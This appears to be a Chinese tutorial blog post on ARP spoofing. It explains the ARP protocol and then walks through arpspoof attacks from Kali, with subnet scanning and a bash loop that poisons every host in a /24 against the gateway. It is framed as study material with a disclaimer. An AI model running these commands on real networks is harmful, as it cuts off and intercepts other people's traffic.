Arp欺骗

ARP

概述

地址解析协议ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。
主机发送信息时将包含自标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息(只有目标IP才会回复信息,其他的会丢弃)以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。

ARP协议的基本功能

基本功能:通过目标设备的IP地址,查询目标设备的MAC地址(物理地址),以保证通信的进行。

局限性:仅能在局域网进行。

ARP常用指令

arp -a

查看缓存中的所有项目

image-20251020212445269

arp -a ip

如果有多人网卡,那么使用arp-a加上接口的lP地址,就可以只显示与该接口相关的ARP缓存项目。

image-20251020212451857

ARP断网攻击(仅供研究学习)

概述

ARP欺骗(英语:ARPspoofing),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域
网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包且可让网上上特定计算机或所有计算机无法正常连线。

原理

攻击者通过伪造ARP响应包,谎称自己的MAC地址对应目标IP(如网关或另一台主机),欺骗局域网内的设备更新其ARP缓存表,导致受害者的网络流量被错误地发送到攻击者的机器,从而实现流量劫持、监听或阻断通信。

步骤

在kali上安装工具

apt-get install dsniff

安装加载数字签名证书

下载签名:

1
wget archive.kali.org/archive-key.asc

安装签名:

1
apt-key add archive-key.asc

使用arpsoof进行断网攻击

arpspoof -i 网卡 -t 目标ip 网关

在kali上网卡名如下

image-20251020212456905

在物理机上命令

ipconfig

得到ip和网关

image-20251020212500237

前提

在kali上打开流量转发

1
echo 1 > /proc/sys/net/ipv4/ip_forward

永久模式

1
sysctl -w net.ipv4.ip_forward=1

扫描同网段下的设备ip

1
nmap -sP --system-dns 10.213.13.0/24

或者

1
nbtscan 10.213.13.0/24

例如我的物理机ip是10.213.13.206

10.213.12.0/23:表示从 10.213.12.110.213.13.254 的所有 IP

像这台LCFC则是我的联想物理机器

其ip即为10.213.13.206

image-20251020212503918

或者用Wireshark 直接流量分析抓包

image-20251020212506585

批量断网攻击脚本(危危危!谨慎使用,仅供学习)

1
2
3
4
for ip in $(seq 1 254); do
  sudo arpspoof -i eth0 -t 10.208.176.$ip 10.208.191.254 &
  sudo arpspoof -i eth0 -t 10.208.191.254 10.208.176.$ip &
done

成功示例

image-20251020212509830

image-20251020212512408

正常关闭即可

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。